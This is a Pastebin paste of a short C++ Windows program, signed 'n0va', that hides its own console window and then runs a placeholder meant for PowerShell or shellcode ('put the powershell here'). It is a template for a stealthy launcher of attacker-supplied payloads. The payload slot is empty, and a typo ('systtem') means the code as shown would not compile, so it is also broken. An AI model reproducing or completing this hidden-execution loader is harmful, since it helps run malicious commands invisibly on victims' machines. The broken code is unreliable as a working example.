Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- You can Compile Online this Code
- http://www.onlinecompiler.net/ <===== HERE
- Created By n0va
- */
- #include <iostream>
- #include <windows.h>
- int shellCode(){
- systtem("color 63");
- system("");// put the powershell here.
- /*
- ((Shell Code into the console))
- */
- return 0;
- }
- void hide(){
- HWND stealth;
- AllocConsole();
- stealth = FindWindowA("ConsoleWindowClass",NULL);
- ShowWindow (stealth,0);
- }
- int main(){
- hide();
- shellCode();
- return 0;
- }
Add Comment
Please, Sign In to add comment